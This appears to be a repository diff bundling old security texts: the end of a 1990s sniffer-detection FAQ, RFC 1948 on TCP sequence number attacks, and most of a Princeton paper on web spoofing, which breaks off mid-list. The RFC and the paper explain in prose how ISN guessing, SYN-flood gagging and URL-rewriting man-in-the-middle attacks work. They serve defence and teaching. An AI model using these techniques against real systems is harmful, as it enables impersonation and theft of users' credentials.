IPX/SPX, TCP/IP, 802.3 protocols of various flavors, most
notably SNA. This posed a big problem when trying to find a
sniffer to examine the network problems we were having, since I
found that some sniffers that understood Ethernet II parse out
some 802.3 traffic as bad packets, and vice versa. I found that
the best protocol parser was in Microsoft's Net Monitor product,
also known as Bloodhound in its earlier incarnations. It is able
to correctly identify such oddities as NetWare control packets,
NT NetBios name service broadcasts, etc, which etherfind on a
Sun simply registered as type 0000 packet broadcasts. It
requires MS Windows 3.1 and runs quite fast on a HP XP60 Pentium
box. Top level monitoring provides network statistics and
information on conversations by mac address (or hostname, if you
bother with an ethers file). Looking at tcpdump style details is
as simple as clicking on a conversation. The filter setup is
also one of the easiest to implement that I've seen, just click
in a dialog box on the hosts you want to monitor. The number of
bad packets it reports on my network is a tiny fraction of that
reported by other sniffers I've used. One of these other
sniffers in particular was reporting a large number of bad
packets with src mac addresses of aa:aa:aa:aa:aa:aa but I don't
see them at all using the MS product. - Anonymous
-------------------------------------------------------------------------------
How to detect a sniffer running.
To detect a sniffing device that only collects data and does not respond to any
of the information, requires physically checking all your ethernet connections
by walking around and checking the ethernet connections individually.
It is also impossible to remotely check by sending a packet or ping if a
machine is sniffing.
A sniffer running on a machine puts the interface into promiscuous mode, which
accepts all the packets. On some Unix boxes, it is possible to detect a
promiscuous interface. It is possible to run a sniffer in non-promiscuous mode,
but it will only capture sessions from the machine it is running on. It is also
possible for the intruder to do similiar capture of sessions by trojaning many
programs such as sh, telnet, rlogin, in.telnetd, and so on to write a log file
of what the user did. They can easily watch the tty and kmem devices as well.
These attacks will only compromise sessions coming from that one machine, while
promiscuous sniffing compromises all sessions on the ethernet.
For SunOs, NetBSD, and other possible BSD derived Unix systems, there is a
command
"ifconfig -a"
that will tell you information about all the interfaces and if they are in
promiscuous mode. DEC OSF/1 and IRIX and possible other OSes require the device
to be specified. One way to find out what interface is on the system, you can
execute:
# netstat -r
Routing tables
Internet:
Destination Gateway Flags Refs Use Interface
default iss.net UG 1 24949 le0
localhost localhost UH 2 83 lo0
Then you can test for each interface by doing the following command:
#ifconfig le0
le0: flags=8863<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST>
inet 127.0.0.1 netmask 0xffffff00 broadcast 255.0.0.1
Intruders often replace commands such as ifconfig to avoid detection. Make sure
you verify its checksum.
There is a program called cpm available on ftp.cert.org:/pub/tools/cpm that
only works on Sunos and is suppose to check the interface for promiscuous flag.
Ultrix can possibly detect someone running a sniffer by using the commands
pfstat and pfconfig.
pfconfig allows you to set who can run a sniffer
pfstat shows you if the interface is in promiscuous mode.
These commands only work if sniffing is enabled by linking it into the kernel.
by default, the sniffer is not linked into the kernel. Most other Unix systems,
such as Irix, Solaris, SCO, etc, do not have any flags indication whether they
are in promiscuous mode or not, therefore an intruder could be sniffing your
whole network and there is no way to detect it.
Often a sniffer log becomes so large that the file space is all used up. On a
high volume network, a sniffer will create a large load on the machine. These
sometimes trigger enough alarms that the administrator will discover a sniffer.
I highly suggest using lsof (LiSt Open Files) available from
coast.cs.purdue.edu:/pub/Purdue/lsof for finding log files and finding programs
that are accessing the packet device such as /dev/nit on SunOs.
There is no commands I know of to detect a promiscuous IBM PC compatible
machine, but they atleast usually do not allow command execution unless from
the console, therefore remote intruders can not turn a PC machine into a
sniffer without inside assistance.
-------------------------------------------------------------------------------
Stopping sniffing attacks
Active hubs send to each system only packets intended for it rendering
promiscuous sniffing useless. This is only effective for 10-Base T.
The following vendors have available active hubs:
* 3Com
* HP
-------------------------------------------------------------------------------
Encryption
There are several packages out there that allow encryption between connections
therefore an intruder could capture the data, but could not decypher it to make
any use of it.
Some packages available are:
* deslogin is one package available at ftp
coast.cs.purdue.edu:/pub/tools/unix/deslogin .
* swIPe is another package available at
ftp.csua.berkeley.edu:/pub/cypherpunks/swIPe/
* Netlock encrypts all (tcp, udp, and raw ip based) communications
transparently. It has automatic (authenticated Diffie-Helman) distibuted
key management mechanism for each host and runs on the SUN 4.1 and HP 9.x
systems. The product comes with a Certification Authority Management
application which generates host certificates (X.509) used for
authentication between the hosts. and provides centralized control of each
Hosts communications rules.
The product is built by Hughes Aircraft and they can be reached at
800-825-LOCK or email at netlock@mls.hac.com.
-------------------------------------------------------------------------------
Kerberos
Kerberos is another package that encrypts account information going over the
network. Some of its draw backs are that all the account information is held on
one host and if that machine is compromised, the whole network is vulnerable.
It is has been reported a major difficulty to set up. Kerberos comes with a
stream-encrypting rlogind, and stream-encrypting telnetd is available. This
prevents intruders from capturing what you did after you logged in.
There is a Kerberos FAQ at ftp at rtfm.mit.edu in
/pub/usenet/comp.protocols/kerberos/Kerberos_Users__Frequently_Asked_Questions_1.11
-------------------------------------------------------------------------------
One time password technology
S/key and other one time password technology makes sniffing account information
almost useless. S/key concept is having your remote host already know a
password that is not going to go over insecure channels and when you connect,
you get a challenge. You take the challenge information and password and plug
it into an algorithm which generates the response that should get the same
answer if the password is the same on the both sides. Therefore the password
never goes over the network, nor is the same challenge used twice. Unlike
SecureID or SNK, with S/key you do not share a secret with the host. S/key is
available on ftp:thumper.bellcore.com:/pub/nmh/skey
Other one time password technology is card systems where each user gets a card
that generates numbers that allow access to their account. Without the card, it
is improbable to guess the numbers.
The following are companies that offer solutions that are provide better
password authenication (ie, handheld password devices):
Secure Net Key (SNK)
Digital Pathways, Inc.
201 Ravendale Dr. Mountainview, Ca.
97703-5216 USA
Phone: 415-964-0707 Fax: (415) 961-7487
Secure ID
Security Dynamics,
One Alewife Center
Cambridge, MA 02140-2312
USA Phone: 617-547-7820
Fax: (617) 354-8836
Secure ID uses time slots as authenication rather than challenge/response.
ArKey and OneTime Pass
Management Analytics
PO Box 1480
Hudson, OH 44236
Email: fc@all.net
Tel:US+216-686-0090 Fax: US+216-686-0092
OneTime Pass (OTP):
This program provides unrestricted one-time pass codes on a user by user basis
without any need for cryptographic protocols or hardware devices. The user
takes a list of usable pass codes and scratches out each one as it is used. The
system tracks usage, removing each passcode from the available list when it is
used. Comes with a very small and fast password tester and password and pass
phrase generation systems.
ArKey:
This is the original Argued Key system that mutually authenticates users and
systems to each other based on their common knowledge. No hardware necessary.
Comes with a very small and fast password tester and password and pass phrase
generation systems.
WatchWord and WatchWord II
Racal-Guardata
480 Spring Park Place
Herndon, VA 22070
703-471-0892
1-800-521-6261 ext 217
CRYPTOCard
Arnold Consulting, Inc.
2530 Targhee Street, Madison, Wisconsin
53711-5491 U.S.A.
Phone : 608-278-7700 Fax: 608-278-7701
Email: Stephen.L.Arnold@Arnold.Com
CRYPTOCard is a modern, SecureID-sized, SNK-compatible device.
SafeWord
Enigma Logic, Inc.
2151 Salvio #301
Concord, CA 94520
510-827-5707 Fax: (510)827-2593
For information about Enigma ftp to: ftp.netcom.com in directory
/pub/sa/safeword
Secure Computing Corporation:
2675 Long Lake Road
Roseville, MN 55113
Tel: (612) 628-2700
Fax: (612) 628-2701
debernar@sctc.com
-------------------------------------------------------------------------------
Non-promiscuous Interfaces
You can try to make sure that most IBM DOS compatible machines have interfaces
that will not allow sniffing. Here is a list of cards that do not support
promiscuous mode:
Test the interface for promiscuous mode by using the Gobbler. If you find a
interface that does do promiscuous mode and it is listed here, please e-mail
cklaus@iss.net so I can remove it ASAP.
IBM Token-Ring Network PC Adapter
IBM Token-Ring Network PC Adapter II (short card)
IBM Token-Ring Network PC Adapter II (long card)
IBM Token-Ring Network 16/4 Adapter
IBM Token-Ring Network PC Adapter/A
IBM Token-Ring Network 16/4 Adapter/A
IBM Token-Ring Network 16/4 Busmaster Server Adapter/A
The following cards are rumoured to be unable to go into promiscuous mode, but
that the veracity of those rumours is doubtful.
Microdyne (Excelan) EXOS 205
Microdyne (Excelan) EXOS 205T
Microdyne (Excelan) EXOS 205T/16
Hewlett-Packard 27250A EtherTwist PC LAN Adapter Card/8
Hewlett-Packard 27245A EtherTwist PC LAN Adapter Card/8
Hewlett-Packard 27247A EtherTwist PC LAN Adapter Card/16
Hewlett-Packard 27248A EtherTwist EISA PC LAN Adapter Card/32
HP 27247B EtherTwist Adapter Card/16 TP Plus
HP 27252A EtherTwist Adapter Card/16 TP Plus
HP J2405A EtherTwist PC LAN Adapter NC/16 TP
Adapters based upon the TROPIC chipset generally do not support promiscuous
mode. The TROPIC chipset is used in IBM's Token Ring adapters such as the 16/4
adapter. Other vendors (notably 3Com) also supply TROPIC based adapters.
TROPIC-based adapters do accept special EPROMs, however, that will allow them
to go into promiscuous mode. However, when in promiscuous mode, these adapters
will spit out a "Trace Tool Present" frame.
-------------------------------------------------------------------------------
Acknowledgements
I would like to thank the following people for the contribution to this FAQ
that has helped to update and shape it:
* Padgett Peterson (padgett@tccslr.dnet.mmc.com)
* Steven Bellovin (smb@research.att.com)
* Wietse Venema (wietse@wzv.win.tue.nl)
* Robert D. Graham (robg@NGC.COM)
* Kevin Martinez (kevinm@beavis.qntm.com)
* Frederick B. Cohen (fc@all.net)
* James Bonfield (jkb@mrc-lmb.cam.ac.uk)
* Marc Horowitz (marc@MIT.EDU)
* Steve Edwards (steve@newline.com)
* Andy Poling (Andy.Poling@jhu.edu)
* Jeff Collyer (jeff@cnet-pnw.com)
* Sara Gordon (sgordon@sun1.iusb.indiana.edu)
-------------------------------------------------------------------------------
Copyright
This paper is Copyright (c) 1994, 1995
by Christopher Klaus of Internet Security Systems, Inc.
Permission is hereby granted to give away free copies electronically. You may
distribute, transfer, or spread this paper electronically. You may not pretend
that you wrote it. This copyright notice must be maintained in any copy made.
If you wish to reprint the whole or any part of this paper in any other medium
(ie magazines, books, etc) excluding electronic medium, please ask the author
for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in connection with the use
or spread of this information. Any use of this information is at the user's own
risk.
Address of Author
Please send suggestions, updates, and comments to:
Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.
<iss@iss.net>
Internet Security Systems, Inc.
Internet Security Systems, Inc, located in Atlanta, Ga., specializes in the
developement of security scanning software tools. Its flagship product,
Internet Scanner, is software that learns an organization's network and probes
every device on that network for security holes. It is the most comprehensive
"attack simulator" available, checking for over 100 security vulnerabilities.
--
Christopher William Klaus Voice: (404)441-2531. Fax: (404)441-2431
Internet Security Systems, Inc. Computer Security Consulting
2000 Miller Court West, Norcross, GA 30071
+341
View File
@@ -0,0 +1,341 @@
Network Working Group S. Bellovin
Request for Comments: 1948 AT&T Research
Category: Informational May 1996
Defending Against Sequence Number Attacks
Status of This Memo
This memo provides information for the Internet community. This memo
does not specify an Internet standard of any kind. Distribution of
this memo is unlimited.
Abstract
IP spoofing attacks based on sequence number spoofing have become a
serious threat on the Internet (CERT Advisory CA-95:01). While
ubiquitous crypgraphic authentication is the right answer, we propose
a simple modification to TCP implementations that should be a very
substantial block to the current wave of attacks.
Overview and Rational
In 1985, Morris [1] described a form of attack based on guessing what
sequence numbers TCP [2] will use for new connections. Briefly, the
attacker gags a host trusted by the target, impersonates the IP
address of the trusted host when talking to the target, and completes
the 3-way handshake based on its guess at the next initial sequence
number to be used. An ordinary connection to the target is used to
gather sequence number state information. This entire sequence,
coupled with address-based authentication, allows the attacker to
execute commands on the target host.
Clearly, the proper solution is cryptographic authentication [3,4].
But it will quite a long time before that is deployed. It has
therefore been necessary for many sites to restrict use of protocols
that rely on address-based authentication, such as rlogin and rsh.
Unfortunately, the prevalence of "sniffer attacks" -- network
eavesdropping (CERT Advisory CA-94:01) -- has rendered ordinary
TELNET [5] very dangerous as well. The Internet is thus left without
a safe, secure mechanism for remote login.
We propose a simple change to TCP implementations that will block
most sequence number guessing attacks. More precisely, such attacks
will remain possible if and only if the Bad Guy already has the
ability to launch even more devastating attacks.
Bellovin Informational [Page 1]
RFC 1948 Sequence Number Attacks May 1996
Details of the Attack
In order to understand the particular case of sequence number
guessing, one must look at the 3-way handshake used in the TCP open
sequence [2]. Suppose client machine A wants to talk to rsh server
B. It sends the following message:
A->B: SYN, ISNa
That is, it sends a packet with the SYN ("synchronize sequence
number") bit set and an initial sequence number ISNa.
B replies with
B->A: SYN, ISNb, ACK(ISNa)
In addition to sending its own initial sequence number, it
acknowledges A's. Note that the actual numeric value ISNa must
appear in the message.
A concludes the handshake by sending
A->B: ACK(ISNb)
The initial sequence numbers are intended to be more or less random.
More precisely, RFC 793 specifies that the 32-bit counter be
incremented by 1 in the low-order position about every 4
microseconds. Instead, Berkeley-derived kernels increment it by a
constant every second, and by another constant for each new
connection. Thus, if you open a connection to a machine, you know to
a very high degree of confidence what sequence number it will use for
its next connection. And therein lies the attack.
The attacker X first opens a real connection to its target B -- say,
to the mail port or the TCP echo port. This gives ISNb. It then
impersonates A and sends
Ax->B: SYN, ISNx
where "Ax" denotes a packet sent by X pretending to be A.
B's response to X's original SYN (so to speak)
B->A: SYN, ISNb', ACK(ISNx)
Bellovin Informational [Page 2]
RFC 1948 Sequence Number Attacks May 1996
goes to the legitimate A, about which more anon. X never sees that
message but can still send
Ax->B: ACK(ISNb')
using the predicted value for ISNb'. If the guess is right -- and
usually it will be -- B's rsh server thinks it has a legitimate
connection with A, when in fact X is sending the packets. X can't
see the output from this session, but it can execute commands as more
or less any user -- and in that case, the game is over and X has won.
There is a minor difficulty here. If A sees B's message, it will
realize that B is acknowledging something it never sent, and will
send a RST packet in response to tear down the connection. There are
a variety of ways to prevent this; the easiest is to wait until the
real A is down (possibly as a result of enemy action, of course). In
actual practice, X can gag A by exploiting a very common
implementation bug; this is described below.
The Fix
The choice of initial sequence numbers for a connection is not
random. Rather, it must be chosen so as to minimize the probability
of old stale packets being accepted by new incarnations of the same
connection [6, Appendix A]. Furthermore, implementations of TCP
derived from 4.2BSD contain special code to deal with such
reincarnations when the server end of the original connection is
still in TIMEWAIT state [7, pp. 945]. Accordingly, simple
randomization, as suggested in [8], will not work well.
But duplicate packets, and hence the restrictions on the initial
sequence number for reincarnations, are peculiar to individual
connections. That is, there is no connection, syntactic or semantic,
between the sequence numbers used for two different connections. We
can prevent sequence number guessing attacks by giving each
connection -- that is, each 4-tuple of <localhost, localport,
remotehost, remoteport> -- a separate sequence number space. Within
each space, the initial sequence number is incremented according to
[2]; however, there is no obvious relationship between the numbering
in different spaces.
The obvious way to do this is to maintain state for dead connections,
and the easiest way to do that is to change the TCP state transition
diagram so that both ends of all connections go to TIMEWAIT state.
That would work, but it's inelegant and consumes storage space.
Instead, we use the current 4 microsecond timer M and set
ISN = M + F(localhost, localport, remotehost, remoteport).
Bellovin Informational [Page 3]
RFC 1948 Sequence Number Attacks May 1996
It is vital that F not be computable from the outside, or an attacker
could still guess at sequence numbers from the initial sequence
number used for some other connection. We therefore suggest that F
be a cryptographic hash function of the connection-id and some secret
data. MD5 [9] is a good choice, since the code is widely available.
The secret data can either be a true random number [10], or it can be
the combination of some per-host secret and the boot time of the
machine. The boot time is included to ensure that the secret is
changed on occasion. Other data, such as the host's IP address and
name, may be included in the hash as well; this eases administration
by permitting a network of workstations to share the same secret data
while still giving them separate sequence number spaces. Our
recommendation, in fact, is to use all three of these items: as
random a number as the hardware can generate, an administratively-
installed pass phrase, and the machine's IP address. This allows for
local choice on how secure the secret is.
Note that the secret cannot easily be changed on a live machine.
Doing so would change the initial sequence numbers used for
reincarnated connections; to maintain safety, either dead connection
state must be kept or a quiet time observed for two maximum segment
lifetimes after such a change.
A Common TCP Bug
As mentioned earlier, attackers using sequence number guessing have
to "gag" the trusted machine first. While a number of strategies are
possible, most of the attacks detected thus far rely on an
implementation bug.
When SYN packets are received for a connection, the receiving system
creates a new TCB in SYN-RCVD state. To avoid overconsumption of
resources, 4.2BSD-derived systems permit only a limited number of
TCBs in this state per connection. Once this limit is reached,
future SYN packets for new connections are discarded; it is assumed
that the client will retransmit them as needed.
When a packet is received, the first thing that must be done is a
search for the TCB for that connection. If no TCB is found, the
kernel searches for a "wild card" TCB used by servers to accept
connections from all clients. Unfortunately, in many kernels this
code is invoked for any incoming packets, not just for initial SYN
packets. If the SYN-RCVD queue is full for the wildcard TCB, any new
packets specifying just that host and port number will be discarded,
even if they aren't SYN packets.
Bellovin Informational [Page 4]
RFC 1948 Sequence Number Attacks May 1996
To gag a host, then, the attacker sends a few dozen SYN packets to
the rlogin port from different port numbers on some non-existent
machine. This fills up the SYN-RCVD queue, while the SYN+ACK packets
go off to the bit bucket. The attack on the target machine then
appears to come from the rlogin port on the trusted machine. The
replies -- the SYN+ACKs from the target -- will be perceived as
packets belonging to a full queue, and will be dropped silently.
This could be avoided if the full queue code checked for the ACK bit,
which cannot legally be on for legitimate open requests. If it is
on, RST should be sent in reply.
Security Considerations
Good sequence numbers are not a replacement for cryptographic
authentication. At best, they're a palliative measure.
An eavesdropper who can observe the initial messages for a connection
can determine its sequence number state, and may still be able to
launch sequence number guessing attacks by impersonating that
connection. However, such an eavesdropper can also hijack existing
connections [11], so the incremental threat isn't that high. Still,
since the offset between a fake connection and a given real
connection will be more or less constant for the lifetime of the
secret, it is important to ensure that attackers can never capture
such packets. Typical attacks that could disclose them include both
eavesdropping and the variety of routing attacks discussed in [8].
If random numbers are used as the sole source of the secret, they
MUST be chosen in accordance with the recommendations given in [10].
Acknowledgments
Matt Blaze and Jim Ellis contributed some crucial ideas to this RFC.
Frank Kastenholz contributed constructive comments to this memo.
References
[1] R.T. Morris, "A Weakness in the 4.2BSD UNIX TCP/IP Software",
CSTR 117, 1985, AT&T Bell Laboratories, Murray Hill, NJ.
[2] Postel, J., "Transmission Control Protocol", STD 7, RFC 793,
September 1981.
[3] Kohl, J., and C. Neuman, "The Kerberos Network Authentication
Service (V5)", RFC 1510, September 1993.
[4] Atkinson, R., "Security Architecture for the Internet
Protocol", RFC 1825, August 1995.
Bellovin Informational [Page 5]
RFC 1948 Sequence Number Attacks May 1996
[5] Postel, J., and J. Reynolds, "Telnet Protocol Specification",
STD 8, RFC 854, May 1983.
[6] Jacobson, V., Braden, R., and L. Zhang, "TCP Extension for
High-Speed Paths", RFC 1885, October 1990.
[7] G.R. Wright, W. R. Stevens, "TCP/IP Illustrated, Volume 2",
1995. Addison-Wesley.
[8] S. Bellovin, "Security Problems in the TCP/IP Protocol Suite",
April 1989, Computer Communications Review, vol. 19, no. 2, pp.
32-48.
[9] Rivest, R., "The MD5 Message-Digest Algorithm", RFC 1321,
April 1992.
[10] Eastlake, D., Crocker, S., and J. Schiller, "Randomness
Recommendations for Security", RFC 1750, December 1994.
[11] L. Joncheray, "A Simple Active Attack Against TCP, 1995, Proc.
Fifth Usenix UNIX Security Symposium.
Author's Address
Steven M. Bellovin
AT&T Research
600 Mountain Avenue
Murray Hill, NJ 07974
Phone: (908) 582-5886
EMail: smb@research.att.com
Bellovin Informational [Page 6]
+452
View File
@@ -0,0 +1,452 @@
Web Spoofing: An Internet Con Game
Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach
Technical Report 540-96
Department of Computer Science, Princeton University
Introduction
This paper describes an Internet security attack that could endanger the
privacy of World Wide Web users and the integrity of their data. The attack
can be carried out on today's systems, endangering users of the most common
Web browsers, including Netscape Navigator and Microsoft Internet Explorer.
Web spoofing allows an attacker to create a "shadow copy" of the entire
World Wide Web. Accesses to the shadow Web are funneled through the
attacker's machine, allowing the attacker to monitor the all of the
victim's activities including any passwords or account numbers the victim
enters. The attacker can also cause false or misleading data to be sent to
Web servers in the victim's name, or to the victim in the name of any Web
server. In short, the attacker observes and controls everything the victim
does on the Web.
We have implemented a demonstration version of this attack.
Spoofing Attacks
In a spoofing attack, the attacker creates misleading context in order to
trick the victim into making an inappropriate security-relevant decision. A
spoofing attack is like a con game: the attacker sets up a false but
convincing world around the victim. The victim does something that would be
appropriate if the false world were real. Unfortunately, activities that
seem reasonable in the false world may have disastrous effects in the real
world.
Spoofing attacks are possible in the physical world as well as the
electronic one. For example, there have been several incidents in which
criminals set up bogus automated-teller machines, typically in the public
areas of shopping malls [1]. The machines would accept ATM cards and ask
the person to enter their PIN code. Once the machine had the victim's PIN,
it could either eat the card or "malfunction" and return the card. In
either case, the criminals had enough information to copy the victim's card
and use the duplicate. In these attacks, people were fooled by the context
they saw: the location of the machines, their size and weight, the way they
were decorated, and the appearance of their electronic displays.
People using computer systems often make security-relevant decisions based
on contextual cues they see. For example, you might decide to type in your
bank account number because you believe you are visiting your bank's Web
page. This belief might arise because the page has a familiar look, because
the bank's URL appears in the browser's location line, or for some other
reason.
To appreciate the range and severity of possible spoofing attacks, we must
look more deeply into two parts of the definition of spoofing:
security-relevant decisions and context.
Security-relevant Decisions
By "security-relevant decision," we mean any decision a person makes that
might lead to undesirable results such as a breach of privacy or
unauthorized tampering with data. Deciding to divulge sensitive
information, for example by typing in a password or account number, is one
example of a security-relevant decision. Choosing to accept a downloaded
document is a security-relevant decision, since in many cases a downloaded
document is capable of containing malicious elements that harm the person
receiving the document [2].
Even the decision to accept the accuracy of information displayed by your
computer can be security-relevant. For example, if you decide to buy a
stock based on information you get from an online stock ticker, you are
trusting that the information provided by the ticker is correct. If
somebody could present you with incorrect stock prices, they might cause
you to engage in a transaction that you would not have otherwise made, and
this could cost you money.
Context
A browser presents many types of context that users might rely on to make
decisions. The text and pictures on a Web page might give some impression
about where the page came from; for example, the presence of a corporate
logo implies that the page originated at a certain corporation.
The appearance of an object might convey a certain impression; for example,
neon green text on a purple background probably came from Wired magazine.
You might think you're dealing with a popup window when what you are seeing
is really just a rectangle with a border and a color different from the
surrounding parts of the screen. Particular graphical items like file-open
dialog boxes are immediately recognized as having a certain purpose.
Experienced Web users react to such cues in the same way that experienced
drivers react to stop signs without reading them.
The names of objects can convey context. People often deduce what is in a
file by its name. Is manual.doc the text of a user manual? (It might be
another kind of document, or it might not be a document at all.) URLs are
another example. Is MICR0S0FT.COM the address of a large software company?
(For a while that address pointed to someone else entirely. By the way, the
round symbols in MICR0S0FT here are the number zero, not the letter O.) Was
dole96.org Bob Dole's 1996 presidential campaign? (It was not; it pointed
to a parody site.)
People often get context from the timing of events. If two things happen at
the same time, you naturally think they are related. If you click over to
your bank's page and a username/password dialog box appears, you naturally
assume that you should type the name and password that you use for the
bank. If you click on a link and a document immediately starts downloading,
you assume that the document came from the site whose link you clicked on.
Either assumption could be wrong.
If you only see one browser window when an event occurs, you might not
realize that the event was caused by another window hiding behind the
visible one.
Modern user-interface designers spend their time trying to devise
contextual cues that will guide people to behave appropriately, even if
they do not explicitly notice the cues. While this is usually beneficial,
it can become dangerous when people are accustomed to relying on context
that is not always correct.
TCP and DNS Spoofing
Another class of spoofing attack, which we will not discuss here, tricks
the user's software into an inappropriate action by presenting misleading
information to that software [3]. Examples of such attacks include TCP
spoofing [4], in which Internet packets are sent with forged return
addresses, and DNS spoofing [5], in which the attacker forges information
about which machine names correspond to which network addresses. These
other spoofing attacks are well known, so we will not discuss them further.
Web Spoofing
Web spoofing is a kind of electronic con game in which the attacker creates
a convincing but false copy of the entire World Wide Web. The false Web
looks just like the real one: it has all the same pages and links. However,
the attacker controls the false Web, so that all network traffic between
the victim's browser and the Web goes through the attacker.
Consequences
Since the attacker can observe or modify any data going from the victim to
Web servers, as well as controlling all return traffic from Web servers to
the victim, the attacker has many possibilities. These include surveillance
and tampering.
Surveillance The attacker can passively watch the traffic, recording which
pages the victim visits and the contents of those pages. When the victim
fills out a form, the entered data is transmitted to a Web server, so the
attacker can record that too, along with the response sent back by the
server. Since most on-line commerce is done via forms, this means the
attacker can observe any account numbers or passwords the victim enters.
As we will see below, the attacker can carry out surveillance even if the
victim has a "secure" connection (usually via Secure Sockets Layer) to the
server, that is, even if the victim's browser shows the secure-connection
icon (usually an image of a lock or a key).
Tampering The attacker is also free to modify any of the data traveling in
either direction between the victim and the Web. The attacker can modify
form data submitted by the victim. For example, if the victim is ordering a
product on-line, the attacker can change the product number, the quantity,
or the ship-to address.
The attacker can also modify the data returned by a Web server, for example
by inserting misleading or offensive material in order to trick the victim
or to cause antagonism between the victim and the server.
Spoofing the Whole Web
You may think it is difficult for the attacker to spoof the entire World
Wide Web, but it is not. The attacker need not store the entire contents of
the Web. The whole Web is available on-line; the attacker's server can just
fetch a page from the real Web when it needs to provide a copy of the page
on the false Web.
How the Attack Works
The key to this attack is for the attacker's Web server to sit between the
victim and the rest of the Web. This kind of arrangement is called a "man
in the middle attack" in the security literature.
URL Rewriting
The attacker's first trick is to rewrite all of the URLs on some Web page
so that they point to the attacker's server rather than to some real
server. Assuming the attacker's server is on the machine www.attacker.org,
the attacker rewrites a URL by adding http://www.attacker.org to the front
of the URL. For example, http://home.netscape.com becomes
http://www.attacker.org/http://home.netscape.com. (The URL rewriting
technique has been used for other reasons by two other Web sites, the
Anonymizer and the Zippy filter. See page 9 for details.)
Figure 1 shows what happens when the victim requests a page through one of
the rewritten URLs. The victim's browser requests the page from
www.attacker.org, since the URL starts with http://www.attacker.org. The
remainder of the URL tells the attacker's server where on the Web to go to
get the real document.
---------------------------------------------------------------------------
Figure 1: An example Web transaction during a Web spoofing attack. The
victim requests a Web page. The following steps occur: (1) the victim's
browser requests the page from the attacker's server; (2) the attacker's
server requests the page from the real server; (3) the real server provides
the page to the attacker's server; (4) the attacker's server rewrites the
page; (5) the attacker's server provides the rewritten version to the
victim.
---------------------------------------------------------------------------
Once the attacker's server has fetched the real document needed to satisfy
the request, the attacker rewrites all of the URLs in the document into the
same special form by splicing http://www.attacker.org/ onto the front. Then
the attacker's server provides the rewritten page to the victim's browser.
Since all of the URLs in the rewritten page now point to www.attacker.org,
if the victim follows a link on the new page, the page will again be
fetched through the attacker's server. The victim remains trapped in the
attacker's false Web, and can follow links forever without leaving it.
Forms
If the victim fills out a form on a page in a false Web, the result appears
to be handled properly. Spoofing of forms works naturally because forms are
integrated closely into the basic Web protocols: form submissions are
encoded in URLs and the replies are ordinary HTML Since any URL can be
spoofed, forms can also be spoofed.
When the victim submits a form, the submitted data goes to the attacker's
server. The attacker's server can observe and even modify the submitted
data, doing whatever malicious editing desired, before passing it on to the
real server. The attacker's server can also modify the data returned in
response to the form submission.
"Secure" connections don't help
One distressing property of this attack is that it works even when the
victim requests a page via a "secure" connection. If the victim does a
"secure" Web access ( a Web access using the Secure Sockets Layer) in a
false Web, everything will appear normal: the page will be delivered, and
the secure connection indicator (usually an image of a lock or key) will be
turned on.
The victim's browser says it has a secure connection because it does have
one. Unfortunately the secure connection is to www.attacker.org and not to
the place the victim thinks it is. The victim's browser thinks everything
is fine: it was told to access a URL at www.attacker.org so it made a
secure connection to www.attacker.org. The secure-connection indicator only
gives the victim a false sense of security.
Starting the Attack
To start an attack, the attacker must somehow lure the victim into the
attacker's false Web. There are several ways to do this. An attacker could
put a link to a false Web onto a popular Web page. If the victim is using
Web-enabled email, the attacker could email the victim a pointer to a false
Web, or even the contents of a page in a false Web. Finally, the attacker
could trick a Web search engine into indexing part of a false Web.
Completing the Illusion
The attack as described thus far is fairly effective, but it is not
perfect. There is still some remaining context that can give the victim
clues that the attack is going on. However, it is possible for the attacker
to eliminate virtually all of the remaining clues of the attack's
existence.
Such evidence is not too hard to eliminate because browsers are very
customizable. The ability of a Web page to control browser behavior is
often desirable, but when the page is hostile it can be dangerous.
The Status Line
The status line is a single line of text at the bottom of the browser
window that displays various messages, typically about the status of
pending Web transfers.
The attack as described so far leaves two kinds of evidence on the status
line. First, when the mouse is held over a Web link, the status line
displays the URL the link points to. Thus, the victim might notice that a
URL has been rewritten. Second, when a page is being fetched, the status
line briefly displays the name of the server being contacted. Thus, the
victim might notice that www.attacker.org is displayed when some other name
was expected.
The attacker can cover up both of these cues by adding a JavaScript program
to every rewritten page. Since JavaScript programs can write to the status
line, and since it is possible to bind JavaScript actions to the relevant
events, the attacker can arrange things so that the status line
participates in the con game, always showing the victim what would have
been on the status line in the real Web. Thus the spoofed context becomes
even more convincing.
The Location Line
The browser's location line displays the URL of the page currently being
shown. The victim can also type a URL into the location line, sending the
browser to that URL. The attack as described so far causes a rewritten URL
to appear in the location line, giving the victim a possible indication
that an attack is in progress.
This clue can be hidden using JavaScript. A JavaScript program can hide the
real location line and replace it by a fake location line which looks right
and is in the expected place. The fake location line can show the URL the
victim expects to see. The fake location line can also accept keyboard
input, allowing the victim to type in URLs normally. Typed-in URLs can be
rewritten by the JavaScript program before being accessed.
Viewing the Document Source
There is one clue that the attacker cannot eliminate, but it is very
unlikely to be noticed.
By using the browser's "view source" feature, the victim can look at the
HTML source for the currently displayed page. By looking for rewritten URLs
in the HTML source, the victim can spot the attack. Unfortunately, HTML
source is hard for novice users to read, and very few Web surfers bother to
look at the HTML source for documents they are visiting, so this provides
very little protection.
A related clue is available if the victim chooses the browser's "view
document information" menu item. This will display information including
the document's real URL, possibly allowing the victim to notice the attack.
As above, this option is almost never used so it is very unlikely that it
will provide much protection.
Bookmarks
There are several ways the victim might accidentally leave the attacker's
false Web during the attack. Accessing a bookmark or jumping to a URL by
using the browser's "Open location" menu item might lead the victim back
into the real Web. The victim might then reenter the false Web by clicking
the "Back" button. We can imagine that the victim might wander in and out
of one or more false Webs. Of course, bookmarks can also work against the
victim, since it is possible to bookmark a page in a false Web. Jumping to
such a bookmark would lead the victim into a false Web again.
Tracing the Attacker
Some people have suggested that this attack can be deterred by finding and
punishing the attacker. It is true that the attacker's server must reveal
its location in order to carry out the attack, and that evidence of that
location will almost certainly be available after an attack is detected.
Unfortunately, this will not help much in practice because attackers will
break into the machine of some innocent person and launch the attack there.
Stolen machines will be used in these attacks for the same reason most bank
robbers make their getaways in stolen cars.
Remedies
Web spoofing is a dangerous and nearly undetectable security attack that
can be carried out on today's Internet. Fortunately there are some
protective measures you can take.
Short-term Solution
In the short run, the best defense is to follow a three-part strategy:
1. disable JavaScript in your browser so the attacker will be unable to
hide the evidence of the attack;
2. make sure your browser's location line is always visible;
